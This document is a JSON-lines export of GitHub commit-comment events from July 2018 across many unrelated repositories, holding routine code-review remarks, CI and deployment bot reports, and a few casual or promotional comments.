{"id":"7909569361","type":"CommitCommentEvent","actor":{"login":"AliNemat"},"repo":{"name":"AliNemat/EpiScale_CrossSection"},"payload":{"comment":{"id":29573783,"position":null,"line":null,"path":null,"commit_id":"aec343b6f74fb1e783d840bfcc9475cfc2388e3e","created_at":"2018-07-03T00:21:36Z","updated_at":"2018-07-03T00:21:36Z","author_association":"OWNER","body":"Just change the nucleus position to average internal nodes position and decrease the contraction"}},"created_at":"2018-07-03T00:21:36Z"}
{"id":"7909573268","type":"CommitCommentEvent","actor":{"login":"Ptival"},"repo":{"name":"hlissner/doom-emacs"},"payload":{"comment":{"id":29573787,"position":null,"line":null,"path":null,"commit_id":"4f40fef59265d86ee25d458be9c478035b3cd9b4","created_at":"2018-07-03T00:23:15Z","updated_at":"2018-07-03T00:23:15Z","author_association":"CONTRIBUTOR","body":"Hey @hlissner , is this a \"safe\" fix so that people who have stack, but whose stack will not be able to build intero, have a nice error?\r\n\r\nIn practice for me, I do not have intero installed globally, but rather stack builds it on a per-project basis.\r\nAs a result, this commit breaks my workflow slightly: intero used to load automatically upon opening a Haskell file, now it fails with the message \"Couldn't find intero. Refusing to enable intero-mode.\"\r\n\r\nBut if I immediately run `M-x intero-mode`, intero boots succesfully. It's a slight annoyance."}},"created_at":"2018-07-03T00:23:15Z"}
{"id":"7909590885","type":"CommitCommentEvent","actor":{"login":"psyas"},"repo":{"name":"psyas/Movie-Recommendation-System-at-Silicon-Valley"},"payload":{"comment":{"id":29573839,"position":null,"line":null,"path":null,"commit_id":"792a1e5d9c91b8f2c647a66e5ed7f511b1866953","created_at":"2018-07-03T00:30:33Z","updated_at":"2018-07-03T00:30:33Z","author_association":"OWNER","body":"데이터 출처 : https://archive.ics.uci.edu/ml/machine-learning-databases/zoo/zoo.data\r\n사용 모델 : sci-kit - decision tree\r\n최적화 \r\n- train/test rate\r\n- max_depth"}},"created_at":"2018-07-03T00:30:33Z"}
{"id":"7909590950","type":"CommitCommentEvent","actor":{"login":"yankunsam"},"repo":{"name":"oasis-eos/eosjs"},"payload":{"comment":{"id":29573840,"position":null,"line":null,"path":null,"commit_id":"5feca4e10ebe1ce2a3260cab2935415cd98d80c4","created_at":"2018-07-03T00:30:34Z","updated_at":"2018-07-03T00:30:34Z","author_association":"COLLABORATOR","body":"sorry for typo, deployed , not deploied."}},"created_at":"2018-07-03T00:30:34Z"}
{"id":"7909591894","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29573847,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-03T00:30:58Z","updated_at":"2018-07-03T00:30:58Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T00:30:58Z"}
{"id":"7909593147","type":"CommitCommentEvent","actor":{"login":"bthaile"},"repo":{"name":"AugurProject/augur"},"payload":{"comment":{"id":29573848,"position":8,"line":178,"path":"src/modules/app/actions/init-augur.js","commit_id":"dfddcd7ce66262bcac339a6011d08aab2345bd3a","created_at":"2018-07-03T00:31:29Z","updated_at":"2018-07-03T00:31:29Z","author_association":"COLLABORATOR","body":"What about passsing in ethereum_network name to pull the env from networkConfig?"}},"created_at":"2018-07-03T00:31:29Z"}
{"id":"7909596227","type":"CommitCommentEvent","actor":{"login":"nuevoalex"},"repo":{"name":"AugurProject/augur"},"payload":{"comment":{"id":29573855,"position":8,"line":178,"path":"src/modules/app/actions/init-augur.js","commit_id":"dfddcd7ce66262bcac339a6011d08aab2345bd3a","created_at":"2018-07-03T00:32:48Z","updated_at":"2018-07-03T00:32:48Z","author_association":"MEMBER","body":"That would limit Augur node to only whats in network.json and require refactoring augur node to just be a selection from those."}},"created_at":"2018-07-03T00:32:48Z"}
{"id":"7909599733","type":"CommitCommentEvent","actor":{"login":"fs-tom"},"repo":{"name":"fsdonks/demand_builder"},"payload":{"comment":{"id":29573860,"position":null,"line":null,"path":null,"commit_id":"5c0a277936df18431633a208b3afc14f1147d5cc","created_at":"2018-07-03T00:34:22Z","updated_at":"2018-07-03T00:34:22Z","author_association":"MEMBER","body":"Rick already wrote a simple shell script to do this, if you're doing what I think you're doing.\r\n\r\nhttps://github.com/fsdonks/potential-chainsaw/blob/master/scripts/make-sha1-files.sh\r\n\r\n"}},"created_at":"2018-07-03T00:34:22Z"}
{"id":"7909603719","type":"CommitCommentEvent","actor":{"login":"bthaile"},"repo":{"name":"AugurProject/augur"},"payload":{"comment":{"id":29573867,"position":8,"line":178,"path":"src/modules/app/actions/init-augur.js","commit_id":"dfddcd7ce66262bcac339a6011d08aab2345bd3a","created_at":"2018-07-03T00:36:03Z","updated_at":"2018-07-03T00:36:03Z","author_association":"COLLABORATOR","body":"I’m saying in addition to your changes. Pass in the individual properties or the network_name. I see your point. The two configs are different. \r\n\r\n"}},"created_at":"2018-07-03T00:36:03Z"}
{"id":"7909605929","type":"CommitCommentEvent","actor":{"login":"nelsonmestevao"},"repo":{"name":"cesium/HeartBits2017"},"payload":{"comment":{"id":29573871,"position":9,"line":9,"path":"_config.yml","commit_id":"1295ecfd93a3267254c76a22dc464975804a6281","created_at":"2018-07-03T00:36:57Z","updated_at":"2018-07-03T00:36:57Z","author_association":"MEMBER","body":"This is what I mean."}},"created_at":"2018-07-03T00:36:57Z"}
{"id":"7909606160","type":"CommitCommentEvent","actor":{"login":"nuevoalex"},"repo":{"name":"AugurProject/augur"},"payload":{"comment":{"id":29573872,"position":8,"line":178,"path":"src/modules/app/actions/init-augur.js","commit_id":"dfddcd7ce66262bcac339a6011d08aab2345bd3a","created_at":"2018-07-03T00:37:03Z","updated_at":"2018-07-03T00:37:03Z","author_association":"MEMBER","body":"even if they were the same we want users to be able to specify their own custom configs"}},"created_at":"2018-07-03T00:37:03Z"}
{"id":"7909608599","type":"CommitCommentEvent","actor":{"login":"nelsonmestevao"},"repo":{"name":"cesium/HeartBits2017"},"payload":{"comment":{"id":29573879,"position":29,"line":18,"path":"Gemfile.lock","commit_id":"96d8da9ad4dca61b277b18279dadd964fca240b3","created_at":"2018-07-03T00:38:03Z","updated_at":"2018-07-03T00:38:03Z","author_association":"MEMBER","body":"I broke the icons :stuck_out_tongue: "}},"created_at":"2018-07-03T00:38:03Z"}
{"id":"7909608935","type":"CommitCommentEvent","actor":{"login":"ZaifSenpai"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29573880,"position":7,"line":13,"path":"Vidly/App_Start/MappingProfile.cs","commit_id":"c79f75ed0acd3be596525ef3bd346b45413ea51f","created_at":"2018-07-03T00:38:12Z","updated_at":"2018-07-03T00:38:12Z","author_association":"NONE","body":"@faridskyman is right. Also, in that pdf, it is written \"CreateMap<...\"\r\n\r\nwhich should be \"Mapper.CreateMap<....\""}},"created_at":"2018-07-03T00:38:12Z"}
{"id":"7909609428","type":"CommitCommentEvent","actor":{"login":"Argos98"},"repo":{"name":"IRamses07/Proyecto1"},"payload":{"comment":{"id":29573882,"position":null,"line":null,"path":null,"commit_id":"7340640d956927b266f0cfe428814f29d0b3a777","created_at":"2018-07-03T00:38:24Z","updated_at":"2018-07-03T00:38:24Z","author_association":"COLLABORATOR","body":"no se que hago xd"}},"created_at":"2018-07-03T00:38:24Z"}
{"id":"7909621148","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"KiLEdEnNis/derogam"},"payload":{"comment":{"id":29573915,"position":null,"line":null,"path":null,"commit_id":"0dfd3e55cef6e2a2b484e4659a7d5148b664705e","created_at":"2018-07-03T00:43:25Z","updated_at":"2018-07-03T00:43:25Z","author_association":"OWNER","body":"I still love you <3"}},"created_at":"2018-07-03T00:43:25Z"}
{"id":"7909621838","type":"CommitCommentEvent","actor":{"login":"quangogage"},"repo":{"name":"quangogage/My-Game"},"payload":{"comment":{"id":29573919,"position":null,"line":null,"path":null,"commit_id":"6e98048de414ac1390783ecaed9074a35c0259af","created_at":"2018-07-03T00:43:43Z","updated_at":"2018-07-03T00:43:43Z","author_association":"OWNER","body":"There is already very little documentation/help on phaser 3.x. Combine that with the fact I am using an es6 syntax and it's proving basically impossible to find any more than an unanswered forum question on any given topic. \r\n\r\nI'm getting closer, though. I am pretty confident I am using the `Scene` component correctly, extending it by `PlayState`. But I am not sure how to arrange classes for elements within the scene (as you can see, I'm struggling with just that, with the `Background` class.)"}},"created_at":"2018-07-03T00:43:43Z"}
{"id":"7909624340","type":"CommitCommentEvent","actor":{"login":"guidofabio732"},"repo":{"name":"guidofabio732/controlstockangular"},"payload":{"comment":{"id":29573922,"position":null,"line":null,"path":null,"commit_id":"4a38a3a021b1c8a52894ed0580758e695b08430d","created_at":"2018-07-03T00:44:46Z","updated_at":"2018-07-03T00:44:46Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-03T00:44:46Z"}
{"id":"7909626613","type":"CommitCommentEvent","actor":{"login":"MaxKaufman"},"repo":{"name":"MaxKaufman/php.train"},"payload":{"comment":{"id":29573930,"position":null,"line":null,"path":null,"commit_id":"4696e5de7a7ba5a2f83c7e7427e1d995b9ea2ca6","created_at":"2018-07-03T00:45:41Z","updated_at":"2018-07-03T00:45:41Z","author_association":"OWNER","body":"2:55"}},"created_at":"2018-07-03T00:45:41Z"}
{"id":"7909627141","type":"CommitCommentEvent","actor":{"login":"indrc"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29573932,"position":76,"line":168,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/state/filesystem/FsCheckpointStreamFactory.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-03T00:45:54Z","updated_at":"2018-07-03T00:45:54Z","author_association":"OWNER","body":" Mainly to get away the deprecation warnings in RandomStringUtils for <v3.6. I think they removed it later on (in 3.7). But as we were bringing in 3.3, if i remember correctly, i had to implement this. To answer your question, they are the same except for the fact that UUID provides lesser entropy."}},"created_at":"2018-07-03T00:45:54Z"}
{"id":"7909628246","type":"CommitCommentEvent","actor":{"login":"quangogage"},"repo":{"name":"quangogage/My-Game"},"payload":{"comment":{"id":29573934,"position":null,"line":null,"path":null,"commit_id":"6e98048de414ac1390783ecaed9074a35c0259af","created_at":"2018-07-03T00:46:22Z","updated_at":"2018-07-03T00:46:22Z","author_association":"OWNER","body":"What am I even supposed to extend `Background` by? I tried `Sprite` and `TileSprite` but they kept spitting out strange errors having to do with `super()`. It needs to be extending by *something* is all I know."}},"created_at":"2018-07-03T00:46:22Z"}
{"id":"7909629933","type":"CommitCommentEvent","actor":{"login":"sdhanavath"},"repo":{"name":"sdhanavath/react-complete-guide"},"payload":{"comment":{"id":29573942,"position":null,"line":null,"path":null,"commit_id":"d5e94987f725603fb906e617fac190afb4bad3f4","created_at":"2018-07-03T00:47:04Z","updated_at":"2018-07-03T00:47:04Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/3bdbce3a-acb0-4bc0-8d5d-a43e2e8011ad?env_id=ibm%3Ayp%3Aeu-gb \"react-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/3abcd8c1-6947-492a-95eb-d1991b197a22?env_id=ibm%3Ayp%3Aeu-gb \"react-app-pipeline\") deployed [react-complete-guide](https://github.com/sdhanavath/react-complete-guide/releases/tag/deploy-ibm-yp-eu-gb-sdhanavath-gmail.com-dev-20180703-004656 \"deploy-ibm-yp-eu-gb-sdhanavath-gmail.com-dev-20180703-004656\") to [dev](https://console.bluemix.net/apps/8d69903c-a941-4129-9eae-31dcd4913105?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:sdhanavath@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-03T00:47:04Z"}
{"id":"7909633702","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29573958,"position":null,"line":null,"path":null,"commit_id":"d7f6d37a985a3e6233d4285f7d55c9e14905e552","created_at":"2018-07-03T00:48:41Z","updated_at":"2018-07-03T00:48:41Z","author_association":"MEMBER","body":":heart: "}},"created_at":"2018-07-03T00:48:41Z"}
{"id":"7909637467","type":"CommitCommentEvent","actor":{"login":"JeanPaulLucien"},"repo":{"name":"Jap2-0/saliengame_idler"},"payload":{"comment":{"id":29573959,"position":null,"line":null,"path":null,"commit_id":"b0df24fcfecfea7d5b91811f1c4f6a685ae0d7ed","created_at":"2018-07-03T00:50:16Z","updated_at":"2018-07-03T00:50:16Z","author_association":"NONE","body":"Oh, you about estimated time for next level. I disabled it for myself."}},"created_at":"2018-07-03T00:50:16Z"}
{"id":"7909639778","type":"CommitCommentEvent","actor":{"login":"vatva691"},"repo":{"name":"LineageOS/android_device_qcom_common"},"payload":{"comment":{"id":29573967,"position":null,"line":null,"path":null,"commit_id":"8dbb46938854fc06a5468c119537fcf67d12fbfe","created_at":"2018-07-03T00:51:14Z","updated_at":"2018-07-03T00:51:14Z","author_association":"NONE","body":"why your start to remove everything ???"}},"created_at":"2018-07-03T00:51:14Z"}
{"id":"7909641347","type":"CommitCommentEvent","actor":{"login":"Adam-J-B"},"repo":{"name":"bill-turner/zippin-pippen"},"payload":{"comment":{"id":29573969,"position":null,"line":null,"path":null,"commit_id":"6e42da25bbc45ab28f0b610554ab7325a9b09da8","created_at":"2018-07-03T00:51:48Z","updated_at":"2018-07-03T00:51:48Z","author_association":"COLLABORATOR","body":"jackpot "}},"created_at":"2018-07-03T00:51:48Z"}
{"id":"7909646231","type":"CommitCommentEvent","actor":{"login":"indrc"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29573976,"position":80,"line":172,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/state/filesystem/FsCheckpointStreamFactory.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-03T00:53:54Z","updated_at":"2018-07-03T00:53:54Z","author_association":"OWNER","body":"The key is prefixed to substitute \"/__ENTROPY_KEY__/\" with \"/\" if injection is disabled. I will add the validation and change it to filesystem.separator. I think you meant separator and not pathseparator."}},"created_at":"2018-07-03T00:53:54Z"}
{"id":"7909647145","type":"CommitCommentEvent","actor":{"login":"jtroshynski"},"repo":{"name":"erictylermartin/osrs-utility"},"payload":{"comment":{"id":29573980,"position":33,"line":33,"path":"src/index.js","commit_id":"1db5f4ccfc38bdc2e368c2b8d47268e470a9fdeb","created_at":"2018-07-03T00:54:18Z","updated_at":"2018-07-03T00:54:18Z","author_association":"NONE","body":"why is this div called statsJson. Idgaf that you got it using json"}},"created_at":"2018-07-03T00:54:18Z"}
{"id":"7909648091","type":"CommitCommentEvent","actor":{"login":"ljjb"},"repo":{"name":"automatak/dnp3"},"payload":{"comment":{"id":29573983,"position":40,"line":65,"path":"cpp/libs/src/opendnp3/app/parsing/APDUHeaderParser.h","commit_id":"c21a51b174a297be0d6d2bfb17243df1ed628307","created_at":"2018-07-03T00:54:44Z","updated_at":"2018-07-03T00:54:44Z","author_association":"NONE","body":"How does this compile? It's leaving const members uninitialized."}},"created_at":"2018-07-03T00:54:44Z"}
{"id":"7909650974","type":"CommitCommentEvent","actor":{"login":"taoste"},"repo":{"name":"inchoong/go"},"payload":{"comment":{"id":29573988,"position":null,"line":null,"path":null,"commit_id":"224b48bb3e10edbd16e7052f5641d4980fde245c","created_at":"2018-07-03T00:55:58Z","updated_at":"2018-07-03T00:55:58Z","author_association":"CONTRIBUTOR","body":"\r\n谷歌上网助手 - Chrome 网上应用店\r\nhttps://chrome.google.com/webstore/detail/谷歌上网助手/nonmafimegllfoonjgplbabhmgfanaka?hl=zh-CN\r\n\r\n> 等谷歌产品\r\n> 简单易用的《谷歌上网助手》，可以解决chrome扩展无法自动更新的问题，同时可以访问谷歌google搜索，gmail邮箱，google+等谷歌服务。\r\n\r\n《谷歌上网助手》一键安装，无需其他配置，即可访问谷歌。\r\n\r\n使用本插件可以免费上：\r\n\r\n>  - google.com     谷歌搜索\r\n>  - mail.google.com   gmail邮箱\r\n>  - chrome商店访问\r\n> \r\n\r\n版本： 1.4.3\r\n最后更新日期： 2018年6月30日"}},"created_at":"2018-07-03T00:55:58Z"}
{"id":"7909651344","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-auth"},"payload":{"comment":{"id":29573989,"position":null,"line":null,"path":null,"commit_id":"2a6f8fdb73d2d7df8d9b848721ca261a4a1a54e9","created_at":"2018-07-03T00:56:09Z","updated_at":"2018-07-03T00:56:09Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\nsecrets:get:project/taskcluster/testing/taskcluster-auth\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/taskcluster/taskcluster-auth:branch:rNy\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    \"secrets:get:project/taskcluster/testing/taskcluster-auth\",\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/github-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/github-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/github-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/github-worker\",\n                \"queue:task-group-id:taskcluster-github/B80YZD0lTl6Q-4D_iyzPFw\",\n                \"queue:schedule-task:taskcluster-github/B80YZD0lTl6Q-4D_iyzPFw/B80YZD0lTl6Q-4D_iyzPFw\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-03T00:56:08.954Z\n\n</details>"}},"created_at":"2018-07-03T00:56:09Z"}
{"id":"7909652878","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29573994,"position":null,"line":null,"path":null,"commit_id":"51751ea2249a576fecd37098884d13c0aefa9af9","created_at":"2018-07-03T00:56:47Z","updated_at":"2018-07-03T00:56:47Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1682 of 1682 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.17%25-green.png)</a>\n"}},"created_at":"2018-07-03T00:56:47Z"}
{"id":"7909657470","type":"CommitCommentEvent","actor":{"login":"bthaile"},"repo":{"name":"AugurProject/augur"},"payload":{"comment":{"id":29574000,"position":null,"line":null,"path":null,"commit_id":"dfddcd7ce66262bcac339a6011d08aab2345bd3a","created_at":"2018-07-03T00:58:49Z","updated_at":"2018-07-03T00:58:49Z","author_association":"COLLABORATOR","body":"Definitely, does this allow for users to hot switch networks or only on initial load of the UI?"}},"created_at":"2018-07-03T00:58:49Z"}
{"id":"7909657851","type":"CommitCommentEvent","actor":{"login":"indrc"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29574004,"position":87,"line":315,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/state/filesystem/FsStateBackend.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-03T00:58:58Z","updated_at":"2018-07-03T00:58:58Z","author_association":"OWNER","body":"Sounds good."}},"created_at":"2018-07-03T00:58:58Z"}
{"id":"7909662142","type":"CommitCommentEvent","actor":{"login":"ShadowMarcelo"},"repo":{"name":"ShadowMarcelo/ENTRETEC1"},"payload":{"comment":{"id":29574022,"position":null,"line":null,"path":null,"commit_id":"7cad65d384cf4444c547349d04d60248de39b453","created_at":"2018-07-03T01:00:41Z","updated_at":"2018-07-03T01:00:41Z","author_association":"OWNER","body":"Essas classes estão uma delicia "}},"created_at":"2018-07-03T01:00:41Z"}
{"id":"7909663499","type":"CommitCommentEvent","actor":{"login":"nuevoalex"},"repo":{"name":"AugurProject/augur"},"payload":{"comment":{"id":29574025,"position":null,"line":null,"path":null,"commit_id":"dfddcd7ce66262bcac339a6011d08aab2345bd3a","created_at":"2018-07-03T01:01:15Z","updated_at":"2018-07-03T01:01:15Z","author_association":"MEMBER","body":"The can hot switch still. The UI needs to be reloaded though by clicking the Open UI button. That's all handled in Augur App"}},"created_at":"2018-07-03T01:01:15Z"}
{"id":"7909666566","type":"CommitCommentEvent","actor":{"login":"MathiasFerrer"},"repo":{"name":"MathiasFerrer/CursoIngresoJS"},"payload":{"comment":{"id":29574037,"position":null,"line":null,"path":null,"commit_id":"2021407b060724a9081d75202cd99ebfa4fa5e9e","created_at":"2018-07-03T01:02:32Z","updated_at":"2018-07-03T01:02:32Z","author_association":"OWNER","body":"Curso ingreso. Dia 1"}},"created_at":"2018-07-03T01:02:32Z"}
{"id":"7909667092","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29574039,"position":null,"line":null,"path":null,"commit_id":"e64b48e97cbdc0bc150f0363d08257144622539f","created_at":"2018-07-03T01:02:47Z","updated_at":"2018-07-03T01:02:47Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.198`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/198) :tada:"}},"created_at":"2018-07-03T01:02:47Z"}
{"id":"7909667886","type":"CommitCommentEvent","actor":{"login":"nsoch"},"repo":{"name":"vsoch/nsoch.github.io"},"payload":{"comment":{"id":29574041,"position":null,"line":null,"path":null,"commit_id":"fac3ad8a954d0ed59a29c3f5ab33cfe2adfd4749","created_at":"2018-07-03T01:03:08Z","updated_at":"2018-07-03T01:03:08Z","author_association":"COLLABORATOR","body":"this was a rewrite of the entire statement"}},"created_at":"2018-07-03T01:03:08Z"}
{"id":"7909669103","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29574044,"position":null,"line":null,"path":null,"commit_id":"e64b48e97cbdc0bc150f0363d08257144622539f","created_at":"2018-07-03T01:03:41Z","updated_at":"2018-07-03T01:03:41Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.299`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/399384788) :tada:"}},"created_at":"2018-07-03T01:03:41Z"}
{"id":"7909670334","type":"CommitCommentEvent","actor":{"login":"Ivankersevan"},"repo":{"name":"Ivankersevan/CursoIngresoJS"},"payload":{"comment":{"id":29574052,"position":23,"line":23,"path":"EntradaSalida-4.html","commit_id":"49687dde6763dee51c87b0771fc706e56b6cdb69","created_at":"2018-07-03T01:04:13Z","updated_at":"2018-07-03T01:04:13Z","author_association":"OWNER","body":"aca cambie el readonly\r\n"}},"created_at":"2018-07-03T01:04:13Z"}
{"id":"7909677091","type":"CommitCommentEvent","actor":{"login":"JuanDhers"},"repo":{"name":"JuanDhers/CursoIngresoJS"},"payload":{"comment":{"id":29574063,"position":9,"line":9,"path":"jsEntradaSalida-4.js","commit_id":"4bec54636f907748180fc5d80d70513a21a84364","created_at":"2018-07-03T01:07:13Z","updated_at":"2018-07-03T01:07:13Z","author_association":"OWNER","body":".value=nombre;\r\n"}},"created_at":"2018-07-03T01:07:13Z"}
{"id":"7909677803","type":"CommitCommentEvent","actor":{"login":"davidcava"},"repo":{"name":"davidcava/shadowsocks-libev-dsm"},"payload":{"comment":{"id":29574066,"position":null,"line":null,"path":null,"commit_id":"9a2b727c8128d8432ba756304b09ba1621a0cffd","created_at":"2018-07-03T01:07:32Z","updated_at":"2018-07-03T01:07:32Z","author_association":"OWNER","body":"Apparently the build process has silently failed to generate the shared libraries for half the architectures. I need to look into that. For now I have removed the broken packages."}},"created_at":"2018-07-03T01:07:32Z"}
{"id":"7909678315","type":"CommitCommentEvent","actor":{"login":"bthaile"},"repo":{"name":"AugurProject/augur"},"payload":{"comment":{"id":29574069,"position":null,"line":null,"path":null,"commit_id":"dfddcd7ce66262bcac339a6011d08aab2345bd3a","created_at":"2018-07-03T01:07:44Z","updated_at":"2018-07-03T01:07:44Z","author_association":"COLLABORATOR","body":"ok, I'll stop on my solution for passing properties to augur ui self hosting. I'll just add file checks for self signed certs in augur-app."}},"created_at":"2018-07-03T01:07:44Z"}
{"id":"7909678762","type":"CommitCommentEvent","actor":{"login":"ensingm2"},"repo":{"name":"ensingm2/saliengame_idler"},"payload":{"comment":{"id":29574070,"position":null,"line":null,"path":null,"commit_id":"ded60c197f0748656307c4eef12ae224032f9925","created_at":"2018-07-03T01:07:55Z","updated_at":"2018-07-03T01:07:55Z","author_association":"OWNER","body":"This change was a mistake. Introduced an error dialog on every auto-planet change."}},"created_at":"2018-07-03T01:07:55Z"}
{"id":"7909680566","type":"CommitCommentEvent","actor":{"login":"dannyroberts"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29574073,"position":43,"line":319,"path":"corehq/apps/couch_sql_migration/couchsqlmigration.py","commit_id":"0bbd4418471a06c8f4937d3162827718e376f822","created_at":"2018-07-03T01:08:37Z","updated_at":"2018-07-03T01:08:37Z","author_association":"MEMBER","body":"I was thinking I might reuse the same timing buckets for other service-level timings (s3 blobdb in this case). Can you explain the name `NORMALIZED_TIMING_BUCKETS`? What's behind the name might inform how I refactor for general use."}},"created_at":"2018-07-03T01:08:37Z"}
{"id":"7909681747","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29574076,"position":null,"line":null,"path":null,"commit_id":"ddfc2288cd218523fc049b83e2a76665c271c8d3","created_at":"2018-07-03T01:09:07Z","updated_at":"2018-07-03T01:09:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-32](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-32).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-32-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-03T01:09:07Z"}
{"id":"7909683403","type":"CommitCommentEvent","actor":{"login":"yeesian"},"repo":{"name":"JuliaGeo/LibGEOS.jl"},"payload":{"comment":{"id":29574079,"position":null,"line":null,"path":null,"commit_id":"f1caf2387e8b736e6fa16d799da9a625ac83bb2d","created_at":"2018-07-03T01:09:47Z","updated_at":"2018-07-03T01:09:47Z","author_association":"MEMBER","body":"oops thanks!"}},"created_at":"2018-07-03T01:09:47Z"}
